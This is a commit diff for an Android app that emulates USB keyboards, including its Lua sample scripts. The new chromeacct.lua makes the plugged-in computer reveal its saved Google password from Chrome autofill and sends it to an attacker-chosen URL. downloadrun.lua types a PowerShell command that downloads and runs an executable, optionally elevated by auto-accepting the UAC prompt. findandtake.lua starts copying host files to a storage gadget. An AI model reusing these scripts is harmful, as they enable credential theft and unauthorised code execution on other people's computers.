usb: fix some service hanging issues

- change the api a bit to be nicer
- more error checking
- fix hid string shift bug
- add some more sample scripts

Author: Netdex

README.md

@@ -53,6 +53,9 @@ while true do
 end
 ```
 
+Several other sample scripts are
+[included in the repository](https://github.com/Netdex/android-usb-script/tree/master/app/src/main/assets/scripts).
+
 ## Requirements
 **This app will not work on every Android device.** If your Android OS has Linux Kernel
 version >= 3.18 and is compiled with configfs and f_hid, then the app can try to create usb

app/src/main/assets/scripts/chromeacct.lua

@@ -0,0 +1,84 @@
+---
+--- expose saved Google account password from Chrome
+---
+
+usb = luausb.create({ id = 0, type = "keyboard" })
+kb = usb.dev[1]
+
+-- This URL will be visited with the captured password appended to the end
+local endpoint = prompt("Endpoint querystring", "https://localhost/index.php?q=")
+
+while true do
+    print("idle")
+
+    -- poll until usb plugged in
+    while usb.state() == "not attached" do
+        wait(1000)
+    end
+
+    print("running")
+    -- wait 1 second for things to settle down
+    wait(1000)
+
+    -- open chrome
+    kb.chord(MOD_LSUPER, KEY_R)
+    wait(1000)
+    kb.string("chrome\n")
+    wait(2000)
+
+    -- open incognito window
+    kb.chord({ MOD_LCTRL, MOD_LSHIFT }, KEY_N)
+    wait(2000)
+
+    -- navigate to login page
+    kb.string("accounts.google.com\n")
+    wait(2000)
+
+    -- autofill username and continue
+    kb.press(KEY_DOWN)
+    wait(100)
+    kb.press(KEY_ENTER)
+    wait(100)
+    kb.press(KEY_ENTER)
+    wait(2000)
+
+    -- autofill password
+    kb.press(KEY_DOWN)
+    wait(100)
+    kb.press(KEY_DOWN)
+    wait(100)
+    kb.press(KEY_ENTER)
+    wait(100)
+    -- unhide password
+    kb.press(KEY_TAB)
+    wait(100)
+    kb.press(KEY_ENTER)
+    wait(100)
+    -- copy password to clipboard
+    kb.chord(MOD_LSHIFT, KEY_TAB)
+    wait(100)
+    kb.chord(MOD_LCTRL, KEY_C)
+    wait(100)
+
+    -- open new tab and navigate to query string with captured password
+    kb.chord(MOD_LCTRL, KEY_T)
+    wait(1000)
+    kb.string(endpoint)
+    kb.chord(MOD_LCTRL, KEY_V)
+    kb.press(KEY_ENTER)
+    wait(2000)
+
+    -- close everything we opened
+    kb.chord(MOD_LALT, KEY_F4)
+    wait(1000)
+    kb.chord(MOD_LALT, KEY_F4)
+    wait(1000)
+
+    print("done")
+    -- poll until usb unplugged
+    while usb.state() == "configured" do
+        wait(1000)
+    end
+    print("disconnected")
+end
+

app/src/main/assets/scripts/composite.lua

@@ -7,30 +7,30 @@ kb1 = usb.dev[1]
 kb2 = usb.dev[2]
 
 while true do
-    usb.log("idle")
+    print("idle")
 
     -- poll until usb plugged in
     while usb.state() == "not attached" do
-        usb.delay(1000)
+        wait(1000)
     end
 
-    usb.log("running")
-    usb.delay(1000)
+    print("running")
+    wait(1000)
 
     -- send a string from keyboard 1
     kb1.send_string("kb1")
-    usb.delay(1000)
+    wait(1000)
     -- send a string from keyboard 2
     kb2.send_string("kb2")
 
-    usb.log("done")
+    print("done")
 
     -- poll until usb unplugged
     while usb.state() == "configured" do
-        usb.delay(1000)
+        wait(1000)
     end
 
-    usb.log("disconnected")
+    print("disconnected")
 
-    usb.delay(1000)
+    wait(1000)
 end

app/src/main/assets/scripts/downloadrun.lua

@@ -6,42 +6,42 @@
 usb = luausb.create({ id = 0, type = "keyboard" })
 kb = usb.dev[1]
 
-local file = usb.ask("File to download?", "https://github.com/Netdex/FlyingCursors/releases/download/1.0.0/FlyingCursors.exe")
-local runAs = usb.should("Task UAC", "Launch exe as admin?");
+local file = prompt("File to download?", "https://github.com/Netdex/FlyingCursors/releases/download/1.0.0/FlyingCursors.exe")
+local runAs = confirm("Task UAC", "Launch exe as admin?");
 
 while true do
-    usb.log("idle")
+    print("idle")
 
     -- poll until usb plugged in
     while usb.state() == "not attached" do
-        usb.delay(1000)
+        wait(1000)
     end
 
-    usb.log("running")
-    usb.delay(1000)
+    print("running")
+    wait(1000)
 
-    usb.log("opening powershell, runAs=" .. tostring(runAs))
+    print("opening powershell, runAs=" .. tostring(runAs))
     if runAs then
         -- when running elevated prompt sometimes it pops in background, so we need
         -- to go to the desktop
-        kb.press_keys(MOD_LSUPER, KEY_D)
-        usb.delay(500)
-        kb.press_keys(MOD_LSUPER, KEY_R)
-        usb.delay(2000)
-        kb.send_string("powershell Start-Process powershell -Verb runAs\n")
-        usb.delay(3000)
-        kb.press_keys(MOD_LALT, KEY_Y)
-        usb.delay(2000)
+        kb.chord(MOD_LSUPER, KEY_D)
+        wait(500)
+        kb.chord(MOD_LSUPER, KEY_R)
+        wait(2000)
+        kb.string("powershell Start-Process powershell -Verb runAs\n")
+        wait(3000)
+        kb.chord(MOD_LALT, KEY_Y)
+        wait(2000)
     else
-        kb.press_keys(MOD_LSUPER, KEY_R)
-        usb.delay(2000)
-        kb.send_string("powershell\n")
-        usb.delay(2000)
+        kb.chord(MOD_LSUPER, KEY_R)
+        wait(2000)
+        kb.string("powershell\n")
+        wait(2000)
     end
 
-    usb.log("download + execute code")
+    print("download + execute code")
 
-    kb.send_string(
+    kb.string(
             "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$d=New-Object System.Net.WebClient;" ..
                     "$u='" .. file .. "';" ..
                     "$f=\"$Env:Temp\\a.exe\";$d.DownloadFile($u,$f);" ..
@@ -50,11 +50,11 @@ while true do
                     "exit;\n"
     )
 
-    usb.log("done")
+    print("done")
     -- poll until usb unplugged
     while usb.state() == "configured" do
-        usb.delay(1000)
+        wait(1000)
     end
-    usb.log("disconnected")
+    print("disconnected")
 end
 

app/src/main/assets/scripts/findandtake.lua

@@ -0,0 +1,34 @@
+---
+--- Copy a file from the system to a mass storage gadget
+---
+usb = luausb.create({ id = 0, type = "keyboard"}, {id = 0, type = "storage" })
+kb = usb.dev[1]
+
+local LABEL = "MY_DRIVE_LABEL" -- label of the drive (as assigned by you)
+
+while true do
+    print("idle")
+
+    -- poll until usb plugged in
+    while usb.state() == "not attached" do
+        wait(1000)
+    end
+
+    print("running")
+    -- wait 1 second for things to settle down
+    wait(1000)
+
+    kb.chord(MOD_LSUPER, KEY_R)
+    wait(1000)
+    kb.string("powershell\n")
+    wait(2000)
+    kb.string("$drive = Get-WmiObject -Class Win32_LogicalDisk -Filter \"VolumeName='" .. LABEL .. "'\" | Select -Expand DeviceID\n")
+
+    print("done")
+    -- poll until usb unplugged
+    while usb.state() == "configured" do
+        wait(1000)
+    end
+    print("disconnected")
+end
+

app/src/main/assets/scripts/massstorage.lua

@@ -1,11 +1,9 @@
 ---
---- Generated by EmmyLua(https://github.com/EmmyLua)
---- Created by netdex.
---- DateTime: 11/16/2020 10:47 AM
+--- a simple default mass storage device
 ---
 
 usb = luausb.create({ id = 0, type = "storage" })
 
 while true do
-    usb.delay(1000)
+    wait(1000)
 end

app/src/main/assets/scripts/mouse.lua

@@ -6,5 +6,5 @@ while true do
     ms1.click(BTN_LEFT)
     ms1.move(30, 0)
     ms1.scroll(128)
-    usb.delay(1000)
+    wait(1000)
 end

app/src/main/assets/scripts/test.lua

@@ -0,0 +1,6 @@
+usb = luausb.create({ id = 0, type = "keyboard" })
+kb = usb.dev[1]
+
+while true do
+    wait(1000)
+end

app/src/main/assets/scripts/wallpaper.lua

@@ -5,24 +5,24 @@
 usb = luausb.create({ id = 0, type = "keyboard" })
 kb = usb.dev[1]
 
-local file = usb.ask("Wallpaper to download?", "https://i.imgur.com/46wWHZ3.png")
+local file = prompt("Wallpaper to download?", "https://i.imgur.com/46wWHZ3.png")
 
 while true do
-    usb.log("idle")
+    print("idle")
 
     -- poll until usb plugged in
     while usb.state() == "not attached" do
-        usb.delay(1000)
+        wait(1000)
     end
 
-    usb.log("running")
-    usb.delay(1000)
+    print("running")
+    wait(1000)
 
-    kb.press_keys(MOD_LSUPER, KEY_R)
-    usb.delay(2000)
-    kb.send_string("powershell\n")
-    usb.delay(2000)
-    kb.send_string("[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;" ..
+    kb.chord(MOD_LSUPER, KEY_R)
+    wait(2000)
+    kb.string("powershell\n")
+    wait(2000)
+    kb.string("[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;" ..
             "(new-object System.Net.WebClient).DownloadFile('" .. file .. "',\"$Env:Temp\\b.jpg\");\n" ..
             "Add-Type @\"\n" ..
             "using System;using System.Runtime.InteropServices;using Microsoft.Win32;namespa" ..
@@ -35,9 +35,9 @@ while true do
             "[W.S]::SW(\"$Env:Temp\\b.jpg\")\n" ..
             "exit\n")
 
-    usb.log("done")
+    print("done")
     -- poll until usb unplugged
     while usb.state() == "configured" do
-        usb.delay(1000)
+        wait(1000)
     end
 end

app/src/main/java/org/netdex/hidfuzzer/MainActivity.java

@@ -14,6 +14,7 @@
 import android.widget.Button;
 import android.widget.ScrollView;
 import android.widget.TextView;
+import android.widget.Toast;
 
 import androidx.annotation.NonNull;
 import androidx.annotation.Nullable;
@@ -79,11 +80,15 @@ public String onPrompt(String title, String def) {
 
     public void createLuaUsbService(LuaUsbTask task) {
         if (activeServiceConn_ != null) {
-            terminateLuaUsbService();
+            Toast.makeText(this, "A task is already running", Toast.LENGTH_SHORT).show();
+            return;
         }
         Intent serviceIntent = new Intent(this, LuaUsbService.class);
         activeServiceConn_ =
-                new LuaUsbServiceConnection(task, () -> handler_.post(() -> btnCancel_.setEnabled(false)));
+                new LuaUsbServiceConnection(task, () -> {
+                    activeServiceConn_ = null;
+                    handler_.post(() -> btnCancel_.setEnabled(false)); // TODO need to unbind...
+                });
         bindService(serviceIntent, activeServiceConn_, BIND_AUTO_CREATE);
         btnCancel_.setEnabled(true);
     }
@@ -92,7 +97,6 @@ public void terminateLuaUsbService() {
         if (activeServiceConn_ != null) {
             btnCancel_.setEnabled(false);
             unbindService(activeServiceConn_); // TODO this can cause ANR
-            activeServiceConn_ = null;
         }
     }